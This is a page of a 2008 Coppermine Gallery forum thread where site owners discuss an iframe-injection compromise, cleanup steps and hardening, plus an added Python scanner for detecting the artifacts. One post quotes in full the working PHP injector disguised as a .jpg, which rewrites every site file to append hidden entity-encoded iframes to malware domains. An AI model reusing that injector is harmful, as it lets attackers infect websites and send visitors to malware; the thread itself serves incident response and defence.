Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 11
 


Started by htgguy, April 06, 2008, 10:04:11 PM


snappop

Is update.php needed for any purpose except for running once after an upgrade?

If not, it would seem logical to delete it after running it once after an upgrade, as it seemed to play a role in the attack.

Thoughts?

molkoaddict

I hope this is the right place to post the question. I have run the update and the Trojan seems to be removed, but my thumbnails are still messed up. I checked my configuration and the settings are right. What is the problem, then? Thanks!

mr.goose

Quote from: molkoaddict
I hope this is the right place to post the question. I have run the update and the Trojan seems to be removed, but my thumbnails are still messed up. I checked my configuration and the settings are right. What is the problem, then? Thanks!
If you look carefully you'll almost certainly find that the hacker has changed your config settings. Log in and change them back to however you want them. Look particularly at the Album List View and Thumbnail View areas. Also if you are using a template with the filmstrip enabled then you will need to adjust that from the Image View section.

Best wishes, G

mr.goose

Quote from: snappop on April 16, 2008, 02:04:47 AM
Is update.php needed for any purpose except for running once after an upgrade?

If not, it would seem logical to delete it after running it once after an upgrade, as it seemed to play a role in the attack.

Thoughts?

I deleted mine. You get a new one when you upgrade. Also according to Nibbler in an earlier post, the update.php included in version 1.5 will be admin only anyway.
Best wishes, G.

IvDogg

Hi everyone, I'm no super expert, so please don't jump on me if I do happen to be wrong. I also did read more than half the entire thread, so give me credit for that in case I say something that has already been said.

A lot of you are way off on how this happened, and how to prevent it from happening.

I have some sites that were affected by this that don't even run php, let alone Coppermine.

One site that was affected runs with just html and flash.

So upgrading your coppermine, deleting certain files, making sure your permissions are correct, won't stop it from happening again, because none of what was suggested applies to most of my sites; I have only a few that run CPG.

Now this is where I could be wrong (this is just my educated opinion): the problem is with the host, possibly just shared hosts (has anyone on a server that they physically maintain been hit? Mine haven't). Possibly only linux or apache hosts as well; has anyone been hit running windows and/or IIS? Mine wasn't. Lastly, a hole in cpanel or other similar shared server apps? The reason I say this is, every single php, html, htm file on my shared hosts was hit, a lot of them had the correct permissions via individual file/directory permissions or with .htaccess blanket permissions, therefore it would not be possible for a single file or script to cause all that damage.

So to fix it, best bet is to restore your site; your database should be fine. If you don't have a backup, download your entire site to your computer, get Notepad++, perform 'search & replace' on 'all open files' until the iframe tag has been removed from all your files. Prevent it from happening? Your guess is as good as mine: change your cpanel and ftp passwords, get on your host maybe. Since a good administrator always has fault tolerance and disaster recovery in mind... if you can't prevent it, make sure you're ready to recover, keep backing up, and be ready to restore until this has been fixed.

IvDogg

Quote from: foulu on April 15, 2008, 07:27:27 AM
Hi,

I made a php file that can sanitize the added data from php & html files that are infected with the iframe thing. I created it to use on one of my working sites, but I think releasing it will help more people. The script is simple: it just checks the current folder and all sub folders for .php & .html files, loops to find the infected string in those files and then removes it. Anyway, use it at your own will; I will not take any responsibility if you damage your site when using it.

I attach the file to this post; download it and rename it to cure.php, upload it to your site & run it.

Is the file you have posted incomplete? It doesn't close out the last function command on line 76?

molkoaddict

Quote from: mr.goose on April 16, 2008, 02:36:32 AM
If you look carefully you'll almost certainly find that the hacker has changed your config settings. Log in and change them back to however you want them. Look particularly at the Album List View and Thumbnail View areas. Also if you are using a template with the filmstrip enabled then you will need to adjust that from the Image View section.

Best wishes, G
Thanks, I've fixed it. Now I'm having problems with creating new intermediate photos when I upload. They aren't showing up. The old photos are, however. I have 'yes' checked in the configuration. What's the problem? Again, sorry if this is the wrong place to post...

foulu

Please download & have a chance to look at the cure.txt file & you will find that it is perfectly fine. Also, it has 80 lines.

Quote from: IvDogg on April 16, 2008, 03:08:50 AM
Is the file you have posted incomplete?  It doesn't close out the last function command on line 76?

Joachim Müller

Quote from: molkoaddict on April 16, 2008, 04:00:45 AM
Again, sorry if this is the wrong place to post...
It is the wrong place.

Quote from: IvDogg on April 16, 2008, 03:02:02 AM
I have some sites that were affected by this that don't even run php, let alone Coppermine.
That sounds hard to believe. You might suffer from a traversal attack - make sure that the HTML-only sites are shielded properly against the other sites (domains) that are hosted on the same server.

Quote from: IvDogg on April 16, 2008, 03:02:02 AM
So to fix it, best bet is to restore your site, your database should be fine.  If you don't have a backup, download your entire site to your computer, get Notepad++, perform 'search & replace' on 'all open files' until the iframe tag has been removed from all your files.
Hm, that sounds pretty time-consuming. To replace identical elements in multiple files, use the freeware Replace in Files.

Quote from: mr.goose on April 16, 2008, 02:40:28 AM
I deleted mine. You get a new one when you upgrade. Also according to Nibbler in an earlier post, the update.php included in version 1.5 will be admin only anyway.
You're safe to delete update.php if you don't need it. As suggested earlier, the file could have been used to determine the table prefix that was needed for the attacker to perform the attack. That's why the file will be admin-only in cpg1.5.x. However, don't expect cpg1.5.x that soon, so you should take care of cpg1.4.x first.

j_taubman

It is perfectly possible for the php compromise in Coppermine to affect all sites in a shared hosting account; for example, the way hostgator is set up by default, the injected script can write to all the files in public_html regardless of the domain they belong to if the other domains are in the same public_html folder, as I know to my cost. I am currently waiting for HG to suggest a solution/lockdown, but I am not holding my breath.

Jane ( creeping away in case she gets in trouble)


NoviceScotty

Hi everyone -

in case it helps anyone, what I did was download all my files to a working directory (using FileZilla).
Luckily I don't have all that many files. I then used UltraEdit to do a <find in files> on the local copy for the hack string iframe or &#.
I found one jpg extension file with the php code. I then looked on the server for the file and made a note of the date it was created.

I then looked through all the server directories with FileZilla to identify all the files that had been changed on or after that date.
As I had locked the site down the day after the attack, there were no valid files changed, so I could see what had been infected.
(I haven't actually upgraded yet - my site is still down, so I can't swear I got everything, but it seems that the attack took place at one specific time.)


Secondly, one of my computers got a trojan/virus from the redirect site, which was very difficult to get rid of.
It was an old computer using internet explorer, although it did have windows automatic updates activated.
(My main computer running Opera wasn't affected.)

ZoneAlarm found and quarantined lots of nasties, but when I rebooted, I still had copies of iexplore.exe being run in the background, and lots of svchost.exe being run (visible in the Task Manager), slowing down internet access and eventually causing errors and forcing a reboot.

I tried running various other tools (Spy Bot, AdAware) and used the Windows repair disk, but to no avail - still iexplore.exe starting in the background.

I then ran Hijack This, and removed everything that I didn't recognise. I also removed all files from the windows program files directory I didn't recognise. It seems that I don't recognise Windows system files, because the computer wouldn't reboot, and so I had to do a new install.
Followed by reinstalling and updating ZoneAlarm. Followed by installing Service Pack 2, which ZoneAlarm seemed to think was a virus, so I had to disable ZoneAlarm during the SP2 install. Followed by Windows Update. And so on - you get the picture.
Since then the system seems to be clean - at least no more iexplore starting.

So, if you have been redirected to the hacking site with IE, I suggest you check that you don't have any unwanted iexplore.exe running and presumably sending data to some Russian mafia site ...

And if you do find something - take the time to find out which potential threats are part of the Windows OS and which are viruses that need to be removed, otherwise it is a l o n g process to reinstall Windows!

Finally, thanks to everyone who is helping out here - I really appreciate this forum!





capecodgal

Quote from: IvDogg on April 16, 2008, 03:02:02 AM
Now this is where I could be wrong (this is just my educated opinion), the problem is with the host, possibly just shared hosts (has anyone on a server that they physically maintain been hit?  Mine haven't).  Possibly only linux or apache hosts as well, has anyone been hit running windows and/or IIS?  Mine wasn't.  Last a hole in cpanel or other similar shared server apps?  The reason I say this is, every single php, html, htm file on my shared hosts were hit, a lot of them had the correct permissions via individual file/directory permissions or with .htaccess blanket permissions, therefore it would not be possible for a single file or script to cause all that damage.

That's kind of along the lines of what I am thinking as well - we run CPG on EVERY site we have on various servers. On host (#1), I believe it is Linux/Apache and shared hosting for sure, it seems it spread through the server to other sites on it (this host just restored us all, so I never saw whether the actual hack was the same iframe script or not; but I do know my one site there had the config messed with in cpg, as my thumbs were all out of whack). Then on host (#2) we did not have any attacks - this is a Windows server which is hosting via IIS and everything is fine and dandy - then on host (#3) we got hit bad.... this was a paid account with a lot of storage, so we had started about 10 sites running on the shared hosting on that account; each and every sub domain was hit with the attack; it looks like it got into one and then spread to all the others... now on this particular attack my co-web noticed they got into our cpanel and messed that all up too. It's hard to say, as I know the permissions were not right on that server (I know I had a lot of things set with access that didn't need it, which was my own fault), but I really think you are onto something that this may not have been an attack on cpg but rather on the OS or the cpanel level instead.

Either way, I know I am pushing it as this is not the place for that discussion, but I really am starting to believe it isn't just a CPG issue; it just seemed to be what all the sites had in common until I started noticing the OS being a probability as well. I think a lot of people just assumed it was cpg that had the hole, as that was where it all seemed to start up.

Either way, kudos to Gau Gau, Nibbler and the rest of the cpg crew for all their hard work on trying to keep the peace and putting up with our panic for the past few weeks.


Nibbler

The hole we fixed is one we know was used to infect a gallery with this malware. It's likely other apps can be exploited in different ways to inject the same malware.

philippe1

Hi from France,
I got hacked on all my web sites. Php files had been replaced and I wonder how hackers got my ftp passwords ...
I'm using spip, dotclear and CPG.
This is the way I solved the problem.
As only php files were corrupted, I changed the properties of folders and files to read and execute BUT NOT WRITE for all php files.
For CPG, the custom header file is the favorite target for hackers.
For Dotclear it's the template.php file.
I would be interested to know how somebody can override the ftp passwords.

The best way to keep a web site clean is to keep a local image of the whole site to be able to replace all the corrupted files easily.

I changed the attributes of a folder to allow writing and it took only 50 minutes for a hacker to corrupt my template.php files.

Philippe



Nookster

Quote from: Moke on April 07, 2008, 05:34:36 AM
Htgguy,

My sites have been hacked too with the same code and I am working my way trying to recover them, but a few things that might help others who find these posts, as it comes up first in Google.

1. The hack is not specific to Coppermine, it simply updates every .php and .html file with its iframe code.

The hack IS specific to Coppermine in that the php script that was executed, which added the iframe tag to your web pages, at least on my site was uploaded through Coppermine. That's not to say there aren't other PHP applications out there with similar vulnerabilities, but this particular exploit exploited Coppermine.

MyWebsiteAdviser

Hi,

My website has been hacked too. The hacker somehow uploaded a "45563131x.jpg" file (this is a php file, not an image!) to the "~/coppermine/albums/userpics/10001" folder.

I am using coppermine 1.4.10, Linux shared web hosting at GoDaddy, MySQL 4.1, PHP  4.3.11. I don't have access to my logs  >:(

Here is the content of the 45563131x.jpg file:
Quote
<?php
//sorry
if (!defined("XSssUI")) {

define("XSssUI", true);
echo "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";

function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];
   
   return $filetype;
}

function parse($path, $pathx) {
   $pg = "<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>";
   $xm = "<?php echo '<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>'; ?>";
   $gg = "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";
   $nm = '<?php
   include("'.$pathx.'");
   ?>';
   $fm = '<?php
   ini_set("register_globals", true);
   if($GLOBALS["fx"]==0) {
   $GLOBALS["fx"]=1;
   echo "'.$gg.'";
   }
   ?>';
   
   $dir_array = array();
   if($handle = opendir($path)) {
      while (false !== ($file = readdir($handle))) {
         if($file != "." && $file != "..") {
            $try_dir = $path.$file.'/';
            if(is_dir($try_dir)) {
               array_push($dir_array, $try_dir);
            }
            else {
               if ($path[strlen($path)-1] != '/') {
                  $path.= '/';
               }
               $f_ext = fileExtension($file);
               if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
                  if($file!="debugger.inc.php") {
                     $fhandle = fopen($path.$file, 'r+');
                     if($f_ext=="php") {
                        chmod($path.$file,0777);
                        $oc = fread($fhandle, filesize($path.$file));
                        fclose($fhandle);
                        $oc = str_replace($xm, '', $oc);
                        $oc = str_replace($fm , '', $oc);
                        $oc = str_replace($nm , '', $oc);
                        $fhandle2 = fopen($path.$file, 'w+');
                        fwrite($fhandle2, $oc.$nm);
                        fclose($fhandle2);
                     }
                     else {
                        chmod($path.$file,0777);
                        $oc = fread($fhandle, filesize($path.$file));
                        fclose($fhandle);
                        $oc = str_replace($pg, '', $oc);
                        $oc = str_replace($gg, '', $oc);
                        $fhandle2 = fopen($path.$file, 'w+');
                        fwrite($fhandle2, $oc.$gg);
                        fclose($fhandle2);
                     }
                  }
               }
            }
         }
      }
      closedir($handle);
   }
      
   return $dir_array;
}



function launch($pathx) {
   $total = 0;
   $last = 1;
   $last_num = 0;
   $path = $_SERVER['DOCUMENT_ROOT'];
   $dirs = array();
   array_push($dirs, $path);

   while($last) {
      $last_num = 0;
      for( $j=$total; $j<$total+$last; $j++) {
         $temp_dirs = parse($dirs[$j], getcwd().'/'.$pathx);
         $last_t = sizeof($temp_dirs);
         $last_num += $last_t;
         for( $i=0; $i<$last_t; $i++) {
            array_push($dirs, $temp_dirs[$i]);
         }
      }
      $total += $last;
      $last = $last_num;      
   }

   $paths = getcwd().'/albums/userpics/10001/123213x';

   if(!is_file($paths.'.jpg')) {
      if(copy($paths.'.zip', $paths.'.jpg')) {
         echo "@#$%";
      }
   }
}

if(isset($_GET['ff']) && isset($_GET['path'])) {
   echo "~!";
   launch($_GET['path']);
}

}   

?>
Alex Webs,
MyWebsiteAdviser.com
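The listing above shows what the injected code leaves behind on a site, and NoviceScotty's post earlier on this page describes the manual way to find it (search a local copy for "iframe" or "&#", then look for files changed after the incident). The script below is an added example, not code from this thread or from the Coppermine project, that automates that defender's check on a local mirror of a site: it flags 1x1 iframes whose src is hidden behind HTML numeric entities (and decodes the src so you can see where it points), a PHP include() appended as the last statement of a .php file, an image file that actually starts with a PHP open tag, and any file modified on or after a cutoff date. The sample site it builds in a temporary directory, the redirect.example domain and the /home/example path are all constructed for the demonstration.

```python
"""Scan a local copy of a web site for the injection artifacts seen in this
thread. Added example, not code from the thread; sample files are constructed."""
import html
import os
import re
import tempfile
from datetime import datetime, timezone

# A 1x1 iframe whose src is hidden behind HTML numeric entities (&#104;&#116;...).
IFRAME_RE = re.compile(r"<iframe\s+src=(['\"])(.*?)\1[^>]*>\s*</iframe>", re.I | re.S)
TINY_RE = re.compile(r"width=['\"]?1\b.*height=['\"]?1\b", re.I | re.S)
ENTITY_RUN_RE = re.compile(r"(?:&#\d+;){4,}")
# A PHP include() appended as the very last statement of a .php file.
TRAILING_INCLUDE_RE = re.compile(
    r"<\?php\s+include\(\s*(['\"])(.*?)\1\s*\)\s*;\s*\?>\s*$", re.I)
IMAGE_EXTS = {".jpg", ".jpeg", ".gif", ".png"}
WEB_EXTS = {".php", ".html", ".htm"}


def scan_file(path, cutoff_ts=None):
    """Return a list of (finding, detail) tuples for one file; empty if clean."""
    findings = []
    with open(path, "rb") as fh:
        data = fh.read()
    ext = os.path.splitext(path)[1].lower()
    text = data.decode("utf-8", errors="replace")
    if ext in WEB_EXTS:
        for m in IFRAME_RE.finditer(text):
            raw_src = m.group(2)
            if ENTITY_RUN_RE.search(raw_src) or TINY_RE.search(m.group(0)):
                # Report the decoded src so the reviewer sees the real target.
                findings.append(("hidden_iframe", html.unescape(raw_src)))
        if ext == ".php":
            m = TRAILING_INCLUDE_RE.search(text)
            if m:  # legitimate files rarely end on a bare include(); review by hand
                findings.append(("trailing_include", m.group(2)))
    if ext in IMAGE_EXTS and data.lstrip().startswith(b"<?"):
        findings.append(("php_in_image", "starts with a PHP open tag, not image data"))
    if cutoff_ts is not None:
        mtime = os.path.getmtime(path)
        if mtime >= cutoff_ts:
            stamp = datetime.fromtimestamp(mtime, timezone.utc).isoformat()
            findings.append(("modified_after_cutoff", stamp))
    return findings


def scan_tree(root, cutoff_ts=None):
    """Walk a local mirror and map relative path -> findings for suspect files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            found = scan_file(path, cutoff_ts)
            if found:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return report


def _entities(s):
    # Numeric-entity form, as used by the injected snippet quoted in the thread.
    return "".join("&#%d;" % ord(c) for c in s)


def build_sample_site():
    """Constructed site mirror: three tampered files, three untouched ones."""
    root = tempfile.mkdtemp(prefix="site_")
    stub = "/home/example/public_html/albums/userpics/10001/123213x.jpg"  # constructed
    files = {
        "index.html": "<html><body>Hello</body>\n<iframe src='%s' width=1 height=1>"
                      "</iframe></html>\n" % _entities("http://redirect.example/dl/adv.php"),
        "about.html": "<html><body><iframe src='https://maps.example/embed' width=600 "
                      "height=400></iframe></body></html>\n",
        "gallery.php": "<?php echo 'gallery'; ?>\n<?php\n   include(\"%s\");\n   ?>" % stub,
        "lib/helper.php": "<?php\nfunction f() { return 1; }\n",
        "albums/userpics/10001/123213x.jpg": "<?php\n//sorry\necho 'not an image';\n",
        "albums/userpics/10001/real.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
    }
    tampered = {"index.html", "gallery.php", "albums/userpics/10001/123213x.jpg"}
    old = datetime(2008, 3, 1, tzinfo=timezone.utc).timestamp()   # before the incident
    hit = datetime(2008, 4, 6, tzinfo=timezone.utc).timestamp()   # incident day
    for rel, content in files.items():
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb" if isinstance(content, bytes) else "w") as fh:
            fh.write(content)
        ts = hit if rel in tampered else old
        os.utime(p, (ts, ts))
    return root


def demo():
    root = build_sample_site()
    cutoff = datetime(2008, 4, 5, tzinfo=timezone.utc).timestamp()
    return scan_tree(root, cutoff)


if __name__ == "__main__":
    for rel, found in sorted(demo().items()):
        for kind, detail in found:
            print("%-40s %-22s %s" % (rel, kind, detail))
```

Run it against a real mirror with `scan_tree("/path/to/local/copy", cutoff_ts)`, where the cutoff is the timestamp of the earliest planted file you found, as NoviceScotty did. The mtime check is only meaningful on a copy that preserves server timestamps (FileZilla can do this) and before any legitimate edits; the content checks work regardless. Treat the report as a review list, not an auto-clean list: a legitimate include() at the end of a file will be flagged too, and restoring from a known-good backup remains the safer fix.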

François Keller

update to the 1.4.18 version (you're running 1.4.10) and clean up your files (read this post http://forum.coppermine-gallery.net/index.php/topic,51927.msg251808.html#msg251808)
next time, search the board  ;)
Did you read the DOC ? the FAQ ? and search the board before posting ?
My Blog

MyWebsiteAdviser

Alex Webs,
MyWebsiteAdviser.com

zac

Sorry but have to say me too.    I had a test version of coppermine that I spaced out on ever updating and that is where the naughty jpg is hiding.  :-[

This exploit went way outside of my cpg install and changed every single php file (1000s) of my website. 

My post is twofold: one, I wanted to thank Gau Gau for your tutorial post and the others in this thread for your quick response to this and for offering up some solutions.

Also I am puzzled by this:

Quote from: Jon F on April 10, 2008, 10:07:49 AM
Some information on the domain itself.

http://whois.domaintools.com/cdpuvbhfzz.com

Interesting whois record.

Is it really that easy to see who created this exploit?  Justice?